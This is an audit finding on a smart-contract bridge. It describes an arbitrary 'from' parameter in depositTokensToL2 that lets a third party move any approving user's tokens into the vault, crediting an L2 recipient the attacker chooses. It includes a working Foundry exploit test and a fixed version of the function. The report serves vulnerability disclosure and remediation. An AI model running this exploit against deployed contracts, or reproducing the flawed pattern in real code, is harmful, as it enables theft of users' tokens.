Submission Details
Severity: high
Valid

Arbitrary from Parameter in depositTokensToL2 Function Leads to Potential Unauthorized Token Transfers

Summary

The L1BossBridge contract's depositTokensToL2 function takes a caller-supplied from address and pulls tokens out of it with safeTransferFrom. Because the function never checks that msg.sender is (or is authorized by) from, anyone can move the tokens of any account that has approved the bridge into the vault, without the owner consenting to that particular transfer.

Vulnerability Details

In the L1BossBridge contract, the depositTokensToL2 function pulls amount tokens from the caller-supplied from address into the contract's vault. It never checks that msg.sender equals from, or is otherwise authorized to spend from's tokens. The only control left is the ERC-20 allowance enforced by safeTransferFrom, and every legitimate depositor must grant the bridge that allowance before they can use the bridge at all. A malicious actor can therefore call depositTokensToL2 with any approved user's address as from and move that user's tokens into the vault, naming an l2Recipient of the attacker's choosing.

```solidity
function depositTokensToL2(address from, address l2Recipient, uint256 amount) external whenNotPaused {
    if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {
        revert L1BossBridge__DepositLimitReached();
    }
    // `from` is caller-supplied and is never compared against msg.sender
    token.safeTransferFrom(from, address(vault), amount);
    // ...
}
```

Impact

Any user who has approved the bridge can have their approved balance (bounded by the allowance and by the remaining DEPOSIT_LIMIT headroom) pulled into the vault by a third party, with the L2 recipient chosen by that third party. Because approving the bridge is a prerequisite for normal use, the exposed population is every user of the bridge; the financial impact scales with the size of those allowances, and an unlimited approval exposes the user's entire balance.

POC

  1. Preparation (optional): A malicious actor sets up a phishing website or application mimicking a legitimate service, with an interface that prompts users to approve the L1BossBridge contract to spend tokens on their behalf. In practice no phishing is needed: any user who wants to deposit through the bridge must approve it first, so every honest depositor is already exposed.

  2. User A approves L1BossBridge to spend tokens on their behalf.

  3. The malicious actor (or an unaware user B) calls depositTokensToL2 with User A's address as the from parameter and an l2Recipient of their choosing.

  4. User A's tokens are transferred into the contract's vault without User A's consent for this specific transaction, and the deposit is attributed to the attacker's chosen L2 recipient.
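The steps above as a Foundry test, added here as an illustration and not part of the original submission. It assumes the Boss Bridge repository layout (src/L1BossBridge.sol, src/L1Token.sol, src/L1Vault.sol with forge-std and OpenZeppelin under lib/), that L1Token mints its supply to the deployer, that L1BossBridge exposes its vault as a public getter, and that the 1000e18 deposit stays under DEPOSIT_LIMIT; the account names and balance are constructed for the test.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added PoC test (not part of the original report). Assumed repo layout:
// src/L1BossBridge.sol, src/L1Token.sol, src/L1Vault.sol, forge-std in lib/.
import { Test } from "forge-std/Test.sol";
import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import { L1BossBridge } from "../src/L1BossBridge.sol";
import { L1Token } from "../src/L1Token.sol";
import { L1Vault } from "../src/L1Vault.sol";

contract ArbitraryFromPoC is Test {
    L1Token token;
    L1BossBridge bridge;
    L1Vault vault;

    // Constructed accounts for the scenario: userA is the victim.
    address userA = makeAddr("userA");
    address attacker = makeAddr("attacker");

    // Assumed to be below the bridge's DEPOSIT_LIMIT.
    uint256 constant USER_A_BALANCE = 1000e18;

    function setUp() public {
        token = new L1Token();                   // assumed: mints supply to deployer
        bridge = new L1BossBridge(IERC20(token));
        vault = bridge.vault();                  // assumed: public vault getter
        token.transfer(userA, USER_A_BALANCE);
    }

    function testAttackerCanDepositVictimsTokens() public {
        // Step 2: userA approves the bridge, exactly as any legitimate
        // depositor must before calling depositTokensToL2.
        vm.prank(userA);
        token.approve(address(bridge), type(uint256).max);

        // Step 3: the attacker calls depositTokensToL2 with userA as `from`
        // and names themselves as the L2 recipient. No approval from the
        // attacker and no tokens held by the attacker are required.
        vm.prank(attacker);
        bridge.depositTokensToL2(userA, attacker, USER_A_BALANCE);

        // Step 4: userA's whole approved balance is now in the vault.
        assertEq(token.balanceOf(userA), 0);
        assertEq(token.balanceOf(address(vault)), USER_A_BALANCE);
        assertEq(token.balanceOf(attacker), 0);  // attacker spent nothing on L1
    }
}
```

Run it with `forge test --match-test testAttackerCanDepositVictimsTokens -vvv`; the test passes precisely because the bridge accepts a from address that is not the caller, so a passing test here demonstrates the bug rather than correct behaviour.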

Tools Used

  • Foundry

  • Slither

Recommendations

Remove the arbitrary from parameter and transfer from msg.sender instead, so a user can only deposit tokens they own and control. safeTransferFrom still requires the depositor's approval, but with this change nobody other than the depositor can trigger the transfer. Note that this changes the function's external signature, so existing callers must be updated.
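The recommendation applied to the function, added here as an illustration and not the project's own code. It keeps the deposit-limit check shown above; the Deposit event emitted after the transfer is an assumption about the rest of the contract, which the report does not reproduce.

```solidity
// Hardened depositTokensToL2 (illustrative, not the project's code).
// The `from` parameter is gone: the only account whose tokens can be pulled
// is the caller, so an allowance granted to the bridge can never be spent by
// a third party. Callers must be updated for the new signature.
function depositTokensToL2(address l2Recipient, uint256 amount) external whenNotPaused {
    if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {
        revert L1BossBridge__DepositLimitReached();
    }
    // safeTransferFrom still enforces the ERC-20 allowance, but the spender
    // and the token owner are now the same account.
    token.safeTransferFrom(msg.sender, address(vault), amount);

    // Assumed: the full contract emits a Deposit event consumed off-chain.
    // Attributing the deposit to msg.sender keeps the L1 payer and the
    // depositor of record in sync.
    emit Deposit(msg.sender, l2Recipient, amount);
}
```

If an approve-then-deposit-on-behalf flow is genuinely required (for example a relayer depositing for a user), it should be gated by an explicit, signed authorization from the token owner rather than by the bare ERC-20 allowance.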

Updates

Lead Judging Commences

0xnevi Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): arbitrary from address
